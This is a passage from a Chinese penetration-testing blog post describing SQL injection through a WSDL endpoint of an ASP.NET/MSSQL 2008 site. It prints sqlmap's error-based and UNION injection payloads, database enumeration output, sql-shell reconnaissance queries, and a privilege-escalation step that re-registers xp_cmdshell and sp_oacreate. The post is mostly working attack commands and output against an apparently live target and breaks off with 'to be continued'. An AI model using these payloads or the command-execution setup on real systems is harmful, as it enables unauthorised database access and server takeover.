    <span class="nx">Title</span><span class="p">:</span> <span class="nx">Microsoft</span> <span class="nx">SQL</span> <span class="nx">Server</span><span class="o">/</span><span class="nx">Sybase</span> <span class="nx">AND</span> <span class="nx">error</span><span class="o">-</span><span class="nx">based</span> <span class="o">-</span> <span class="nx">WHERE</span> <span class="nx">or</span> <span class="nx">HAVING</span> <span class="nx">clause</span> <span class="p">(</span><span class="nx">IN</span><span class="p">)</span>
    <span class="nx">Payload</span><span class="p">:</span> <span class="nx">ins</span><span class="o">=</span><span class="nx">eizSls</span><span class="dl">'</span><span class="s1"> AND 7541 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7541=7541) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(120)+CHAR(113))) AND </span><span class="dl">'</span><span class="nx">EJIL</span><span class="dl">'</span><span class="s1">=</span><span class="dl">'</span><span class="nx">EJIL</span>

    <span class="nx">Type</span><span class="p">:</span> <span class="nx">UNION</span> <span class="nx">query</span>
    <span class="nx">Title</span><span class="p">:</span> <span class="nx">Generic</span> <span class="nx">UNION</span> <span class="nx">query</span> <span class="p">(</span><span class="nx">NULL</span><span class="p">)</span> <span class="o">-</span> <span class="mi">7</span> <span class="nx">columns</span>
    <span class="nx">Payload</span><span class="p">:</span> <span class="nx">ins</span><span class="o">=</span><span class="nx">eizSls</span><span class="dl">'</span><span class="s1"> UNION ALL SELECT NULL,CHAR(113)+CHAR(120)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(67)+CHAR(85)+CHAR(78)+CHAR(111)+CHAR(108)+CHAR(112)+CHAR(72)+CHAR(81)+CHAR(82)+CHAR(108)+CHAR(89)+CHAR(68)+CHAR(67)+CHAR(99)+CHAR(105)+CHAR(109)+CHAR(105)+CHAR(86)+CHAR(121)+CHAR(99)+CHAR(122)+CHAR(90)+CHAR(109)+CHAR(112)+CHAR(98)+CHAR(88)+CHAR(89)+CHAR(68)+CHAR(90)+CHAR(101)+CHAR(71)+CHAR(100)+CHAR(118)+CHAR(81)+CHAR(114)+CHAR(83)+CHAR(101)+CHAR(90)+CHAR(117)+CHAR(100)+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- HqcH
---
</span></code></pre></div></div>

<h1 id="信息搜集">信息搜集</h1>
<p>康康user，发现是dbo。<a href="https://blog.csdn.net/u010678947/article/details/48289849">SQL SERVER中[dbo]的解释：</a></p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">web</span> <span class="nx">server</span> <span class="nx">operating</span> <span class="nx">system</span><span class="p">:</span> <span class="nx">Windows</span> <span class="mi">2008</span> <span class="nx">R2</span> <span class="nx">or</span> <span class="mi">7</span>
<span class="nx">web</span> <span class="nx">application</span> <span class="nx">technology</span><span class="p">:</span> <span class="nx">ASP</span><span class="p">.</span><span class="nx">NET</span> <span class="mf">4.0</span><span class="p">.</span><span class="mi">30319</span><span class="p">,</span> <span class="nx">Microsoft</span> <span class="nx">IIS</span> <span class="mf">7.5</span><span class="p">,</span> <span class="nx">ASP</span><span class="p">.</span><span class="nx">NET</span>
<span class="nx">back</span><span class="o">-</span><span class="nx">end</span> <span class="nx">DBMS</span><span class="p">:</span> <span class="nx">Microsoft</span> <span class="nx">SQL</span> <span class="nx">Server</span> <span class="mi">2008</span>
<span class="p">[</span><span class="mi">11</span><span class="p">:</span><span class="mi">16</span><span class="p">:</span><span class="mi">02</span><span class="p">]</span> <span class="p">[</span><span class="nx">INFO</span><span class="p">]</span> <span class="nx">calling</span> <span class="nx">Microsoft</span> <span class="nx">SQL</span> <span class="nx">Server</span> <span class="nx">shell</span><span class="p">.</span> <span class="nx">To</span> <span class="nx">quit</span> <span class="nx">type</span> <span class="dl">'</span><span class="s1">x</span><span class="dl">'</span> <span class="nx">or</span> <span class="dl">'</span><span class="s1">q</span><span class="dl">'</span> <span class="nx">and</span> <span class="nx">press</span> <span class="nx">ENTER</span>
<span class="nx">sql</span><span class="o">-</span><span class="nx">shell</span><span class="o">&gt;</span> <span class="nx">user</span>
<span class="p">[</span><span class="mi">11</span><span class="p">:</span><span class="mi">16</span><span class="p">:</span><span class="mi">13</span><span class="p">]</span> <span class="p">[</span><span class="nx">INFO</span><span class="p">]</span> <span class="nx">fetching</span> <span class="nx">SQL</span> <span class="nx">query</span> <span class="nx">output</span><span class="p">:</span> <span class="dl">'</span><span class="s1">user</span><span class="dl">'</span>
<span class="nx">user</span><span class="p">:</span>    <span class="dl">'</span><span class="s1">dbo</span><span class="dl">'</span>
</code></pre></div></div>
<p>看一下服务器是否站库分离：</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">sql</span><span class="o">-</span><span class="nx">shell</span><span class="o">&gt;</span> <span class="nx">select</span> <span class="p">@@</span><span class="nd">servername</span><span class="p">;</span>
<span class="p">[</span><span class="mi">11</span><span class="p">:</span><span class="mi">17</span><span class="p">:</span><span class="mi">21</span><span class="p">]</span> <span class="p">[</span><span class="nx">INFO</span><span class="p">]</span> <span class="nx">fetching</span> <span class="nx">SQL</span> <span class="nx">SELECT</span> <span class="nx">statement</span> <span class="nx">query</span> <span class="nx">output</span><span class="p">:</span> <span class="dl">'</span><span class="s1">select @@servername</span><span class="dl">'</span>
<span class="nx">select</span> <span class="p">@@</span><span class="nd">servername</span><span class="p">;:</span>    <span class="dl">'</span><span class="s1">WIN-VO157IKGT24</span><span class="dl">'</span>
<span class="nx">sql</span><span class="o">-</span><span class="nx">shell</span><span class="o">&gt;</span> <span class="nx">select</span> <span class="nx">host_name</span><span class="p">();</span>
<span class="p">[</span><span class="mi">11</span><span class="p">:</span><span class="mi">17</span><span class="p">:</span><span class="mi">25</span><span class="p">]</span> <span class="p">[</span><span class="nx">INFO</span><span class="p">]</span> <span class="nx">fetching</span> <span class="nx">SQL</span> <span class="nx">SELECT</span> <span class="nx">statement</span> <span class="nx">query</span> <span class="nx">output</span><span class="p">:</span> <span class="dl">'</span><span class="s1">select host_name()</span><span class="dl">'</span>
<span class="nx">select</span> <span class="nx">host_name</span><span class="p">();:</span>    <span class="dl">'</span><span class="s1">WIN-VO157IKGT24</span><span class="dl">'</span>
</code></pre></div></div>
<p>两个都是<code class="language-plaintext highlighter-rouge">WIN-VO157IKGT24</code>所以应该没有站库分离。看一下数据库版本号</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">sql</span><span class="o">-</span><span class="nx">shell</span><span class="o">&gt;</span> <span class="nx">Select</span> <span class="p">@@</span><span class="nd">version</span>
<span class="p">[</span><span class="mi">11</span><span class="p">:</span><span class="mi">17</span><span class="p">:</span><span class="mi">34</span><span class="p">]</span> <span class="p">[</span><span class="nx">INFO</span><span class="p">]</span> <span class="nx">fetching</span> <span class="nx">SQL</span> <span class="nx">SELECT</span> <span class="nx">statement</span> <span class="nx">query</span> <span class="nx">output</span><span class="p">:</span> <span class="dl">'</span><span class="s1">Select @@version</span><span class="dl">'</span>
<span class="nx">Select</span> <span class="p">@@</span><span class="nd">version</span><span class="p">:</span>    <span class="dl">'</span><span class="s1">Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) </span><span class="se">\n\t</span><span class="s1">Apr  2 2010 15:48:46 </span><span class="se">\n\t</span><span class="s1">Copyright (c) Microsoft Corporation</span><span class="se">\n\t</span><span class="s1">Standard Edition (64-bit) on Windows NT 6.1 &lt;X64&gt; (Build 7601: Service Pack 1)</span><span class="se">\n</span><span class="dl">'</span>
</code></pre></div></div>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">root</span><span class="p">@</span><span class="err">#</span><span class="p">:</span><span class="o">/</span><span class="nx">home</span><span class="o">/</span><span class="nx">tool</span><span class="o">/</span><span class="nx">sqlmap</span><span class="o">-</span><span class="nx">data</span><span class="o">/</span><span class="nx">wsdl</span><span class="o">-</span><span class="nx">inject</span><span class="err">#</span> <span class="nx">sqlmap</span> <span class="o">-</span><span class="nx">r</span> <span class="nx">net</span><span class="o">-</span><span class="nx">test1</span><span class="p">.</span><span class="nx">txt</span> <span class="o">--</span><span class="nx">batch</span> <span class="o">--</span><span class="nx">dbs</span>
<span class="o">---</span>
<span class="p">[</span><span class="mi">11</span><span class="p">:</span><span class="mi">04</span><span class="p">:</span><span class="mi">34</span><span class="p">]</span> <span class="p">[</span><span class="nx">INFO</span><span class="p">]</span> <span class="nx">the</span> <span class="nx">back</span><span class="o">-</span><span class="nx">end</span> <span class="nx">DBMS</span> <span class="nx">is</span> <span class="nx">Microsoft</span> <span class="nx">SQL</span> <span class="nx">Server</span>
<span class="nx">web</span> <span class="nx">server</span> <span class="nx">operating</span> <span class="nx">system</span><span class="p">:</span> <span class="nx">Windows</span> <span class="mi">2008</span> <span class="nx">R2</span> <span class="nx">or</span> <span class="mi">7</span>
<span class="nx">web</span> <span class="nx">application</span> <span class="nx">technology</span><span class="p">:</span> <span class="nx">ASP</span><span class="p">.</span><span class="nx">NET</span> <span class="mf">4.0</span><span class="p">.</span><span class="mi">30319</span><span class="p">,</span> <span class="nx">Microsoft</span> <span class="nx">IIS</span> <span class="mf">7.5</span><span class="p">,</span> <span class="nx">ASP</span><span class="p">.</span><span class="nx">NET</span>
<span class="nx">back</span><span class="o">-</span><span class="nx">end</span> <span class="nx">DBMS</span><span class="p">:</span> <span class="nx">Microsoft</span> <span class="nx">SQL</span> <span class="nx">Server</span> <span class="mi">2008</span>
<span class="p">[</span><span class="mi">11</span><span class="p">:</span><span class="mi">04</span><span class="p">:</span><span class="mi">34</span><span class="p">]</span> <span class="p">[</span><span class="nx">INFO</span><span class="p">]</span> <span class="nx">fetching</span> <span class="nx">database</span> <span class="nx">names</span>
<span class="nx">available</span> <span class="nx">databases</span> <span class="p">[</span><span class="mi">7</span><span class="p">]:</span>
<span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="nx">master</span>
<span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="nx">model</span>
<span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="nx">msdb</span>
<span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="nx">ReportServer</span>
<span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="nx">ReportServerTempDB</span>
<span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="nx">tempdb</span>
<span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="nx">ytems</span>

<span class="p">[</span><span class="mi">11</span><span class="p">:</span><span class="mi">04</span><span class="p">:</span><span class="mi">35</span><span class="p">]</span> <span class="p">[</span><span class="nx">INFO</span><span class="p">]</span> <span class="nx">fetched</span> <span class="nx">data</span> <span class="nx">logged</span> <span class="nx">to</span> <span class="nx">text</span> <span class="nx">files</span> <span class="nx">under</span> <span class="dl">'</span><span class="s1">/root/.sqlmap/output/underattack-host</span><span class="dl">'</span>

<span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="nx">shutting</span> <span class="nx">down</span> <span class="nx">at</span> <span class="mi">11</span><span class="p">:</span><span class="mi">04</span><span class="p">:</span><span class="mi">35</span>
</code></pre></div></div>

<h1 id="提权">提权</h1>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">dbcc</span> <span class="nx">addextendedproc</span> <span class="p">(</span><span class="dl">"</span><span class="s2">sp_oacreate</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">odsole70.dll</span><span class="dl">"</span><span class="p">);</span>
<span class="nx">dbcc</span> <span class="nx">addextendedproc</span> <span class="p">(</span><span class="dl">"</span><span class="s2">xp_cmdshell</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">xplog70.dll</span><span class="dl">"</span><span class="p">);</span>
</code></pre></div></div>
<p>to be continued；</p>

            </div>
            <div class="spacing"></div>
            <div>
	<div class="hline"></div>
	<h3><em>#</em> 申明</h3>
	<div class="spacing"></div>
	<h4><em>By: Bin4xin.</em></h4>
	<h4>转载请申明本文链接：<a href="/blog/2020/wsdl/inject/" target="_blank"> 「渗透」:SQL注入新姿势:)</a></h4>

	<h3><em># Any Questions</em></h3>
	<div class="spacing"></div>
	<h4> >_ 对本文进行提问：<a href="https://github.com/Bin4xin/bin4xin.github.io/issues/new?permalink=https://github.com/Bin4xin/bin4xin.github.io/blob/1b4fffa6232dc6ffa2cece8be0d6c39e0c5f9cfe/blog/2020/wsdl/inject/index.html%23L84" target="_blank"> <em><li class="fa fa-github"></li> Reference in new issue.</em></a></h4>

	<h4> >_ 对本文进行留言：<a href="https://github.com/Bin4xin/bin4xin.github.io/issues/new?permalink=https://bin4xin.github.io/blog/2020/wsdl/inject/" target="_blank"> <em><li class="fa fa-github"></li> Leave a Comment.</em></a></h4>
	<div class="spacing"></div>
</div>
        </div><!--/col-lg-8 -->
        
        <div class="col-lg-3">
    <h4>Subscribe/订阅</h4>
    <div class="hline"></div>
        <p>
        <p class="rss-subscribe"><i class="fa fa-rss"></i> Subscribe to this blog <a href="/feed.xml">via RSS</a>.</p>
        </p>
    <div class="spacing"></div>
    <h4>Categories/分类目录</h4>
    <div class="hline"></div>
        
        <div class="post-meta mb-3">
        <div class="spacing"></div>
<!--          <i class="far fa-folder-open fa-fw mr-1"></i>-->
<!--          -->
<!--            <a href='/blog/'>blog</a>-->
<!---->
<!--          -->
<!--            <a href='/web/'>Web</a>-->
<!---->
<!--          -->
<!--            <a href='/%E7%AC%94%E8%AE%B0/'>笔记</a>-->
<!---->
<!--          -->
<!--            <a href='/%E6%B8%97%E9%80%8F/'>渗透</a>-->
<!---->
<!--          -->
            <details>
                <summary class="point">本文分类</summary>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/blog/'>blog</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/Web/'>Web</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/%E7%AC%94%E8%AE%B0/'>笔记</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/%E6%B8%97%E9%80%8F/'>渗透</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
            </details>
        </div>
        
        <p>
    <details>
        <summary class="point">所有标签/数量</summary>
        
        <p>
            <i class="fa fa-angle-right"></i> Web
            <span class="badge badge-theme pull-right">11</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 漏洞复现
            <span class="badge badge-theme pull-right">9</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 渗透
            <span class="badge badge-theme pull-right">8</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Vulnhub
            <span class="badge badge-theme pull-right">6</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 安全工具
            <span class="badge badge-theme pull-right">5</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 笔记
            <span class="badge badge-theme pull-right">32</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 软件移植
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Arm
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 主动防御
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 技巧
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Android reverse
            <span class="badge badge-theme pull-right">4</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 排错
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Waf
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Maven
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Python
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Terminal
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Docker
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Cve
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Sql-inject
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Bash
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 内网
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 信息搜集
            <span class="badge badge-theme pull-right">6</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Fuzz
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Vulnhub
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Src
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Daily
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
    </details>
    <div class="spacing"></div>

    <h4>Tags/标签</h4>
    <div class="hline"></div>
    <p>
        
            <a class="btn btn-theme" href='/' role="button">Web (11)</a>
        
            <a class="btn btn-theme" href='/' role="button">漏洞复现 (9)</a>
        
            <a class="btn btn-theme" href='/' role="button">渗透 (8)</a>
        
            <a class="btn btn-theme" href='/' role="button">Vulnhub (6)</a>
        
            <a class="btn btn-theme" href='/' role="button">安全工具 (5)</a>
        
            <a class="btn btn-theme" href='/' role="button">笔记 (32)</a>
        
            <a class="btn btn-theme" href='/' role="button">软件移植 (2)</a>
        
            <a class="btn btn-theme" href='/' role="button">Arm (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">主动防御 (2)</a>
        
            <a class="btn btn-theme" href='/' role="button">技巧 (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Android reverse (4)</a>
        
            <a class="btn btn-theme" href='/' role="button">排错 (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Waf (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Maven (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Python (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Terminal (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Docker (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Cve (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Sql-inject (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Bash (2)</a>
        
            <a class="btn btn-theme" href='/' role="button">内网 (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">信息搜集 (6)</a>
        
            <a class="btn btn-theme" href='/' role="button">Fuzz (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Vulnhub (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Src (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Daily (2)</a>
        
    </p>
    <div class="spacing"></div>

    <h4>Article Directory/文章目录</h4>
    <div class="hline"></div>
    <p>
        <ul id="toc" class="section-nav">
<li class="toc-entry toc-h1"><a href="#目标确定">目标确定</a></li>
<li class="toc-entry toc-h1"><a href="#sqlmap一把梭">sqlmap一把梭</a>
<ul>
<li class="toc-entry toc-h2"><a href="#wsdl注入">wsdl注入</a></li>
<li class="toc-entry toc-h2"><a href="#常规查询">常规查询：</a></li>
</ul>
</li>
<li class="toc-entry toc-h1"><a href="#信息搜集">信息搜集</a></li>
<li class="toc-entry toc-h1"><a href="#提权">提权</a></li>
</ul>
    </p>

</div>


    </div><!--/row -->
        
</div><!--/container -->


        <div id="footerwrap">
    <div class="container">
        <div class="row">
            <div class="col-sm-4">
                <div class="col-sm-6">
                  <p class="thuhidden"><strong>入门</strong></p>
                  <p class="thuhidden"><a href="https://github.com/tuna/mirror-web" target="blank"><em>Jekyll</em>源码</a></p>
                  <p class="thuhidden"><a href="https://www.sentrylab.cn/blog/2019/jekyll/in/linux" target="blank">博客搭建教程</a></p>
                  <p class="thuhidden"><a href="https://about.sentrylab.cn/news/sentry-lab-markdown-usage/" target="blank">个性化语法批注</a></p>
                  <p class="thuhidden"><a href="https://www.sentrylab.cn/blog/2019/nginx/with/jekyll-site/" target="blank">公网部署</a></p>
                  </div>

                  <div class="col-sm-6">
                  <p class="thuhidden"><strong>社区</strong></p>
                  <p class="thuhidden"><a href="/blog" target="blank">博客</a></p>
                  <p class="thuhidden"><a href="https://github.com/Bin4xin/bigger-than-bigger/tree/master/CoVV" target="blank"><em>Collection of verified vulnerabilities</em></a></p>
                  <p class="thuhidden"><a href="https://github.com/Bin4xin/bigger-than-bigger" target="blank"><em>Bigger than Bigger</em></a></p>
                  <p class="thuhidden"><a href="https://github.com/Bin4xin/B4xinSynchronize" target="blank"><em>B4xinSynchronize</em></a></p>
                  </div>
            </div>

        <div class="col-sm-4">
                  <div class="col-sm-6">
                    <p class="thuhidden"><strong>开发</strong></p>
                    <p class="thuhidden"><a href="https://github.com/Bin4xin/Bin4xin" target="blank"><em>Bin4xin</em></a></p>
                    <p class="thuhidden"><a href="https://www.cloudflare.com/waf/" target="blank"><em>CloudFlare WAF</em></a></p>
                    <p class="thuhidden"><a href="https://jekyllrb.com/docs/" target="blank"><em>Jekyll</em></a></p>
                    <p class="thuhidden"><a href="https://www.markdownguide.org/" target="blank"><em>MarkDown</em></a></p>
                    <p class="share">
                    <a href="https://github.com/Bin4xin/" target="blank"><i class="fa fa-github"></i></a>
                    <a href="https://twitter.com/Bin4xin"><i class="fa fa-twitter" target="blank"></i></a>
                    <a href="#"><i class="fa fa-facebook" target="blank"></i></a>
                    </p>
                  </div>

                  <div class="col-sm-6">
                    <p class="thuhidden"><strong>关于</strong></p>
                    <p class="thuhidden"><a href="https://about.sentrylab.cn/" target="blank">近期研究</a></p>
                    <p class="thuhidden">∑ <csmall>(Visitors/times)</csmall></em></p>
                    <img src="https://profile-counter.glitch.me/bin4xin.github.io/count.svg" style="max-width:100%;">
                  </div>
            </div>

        <div class="col-sm-4">
          
          <picture>
  <img src="/assets/img/logo-small@3x.jpg" srcset="/assets/img/logo-small@3x.png 1x" />
  </picture>

        </div>
        </div><!--/row -->
      <p class="thuhidden">© 2019-2021 SentrySec, Lab. Build by Jekyll under the terms of the MIT License.</p>
    </div><!--/container -->
</div><!--/footerwrap -->
    </body>
</html>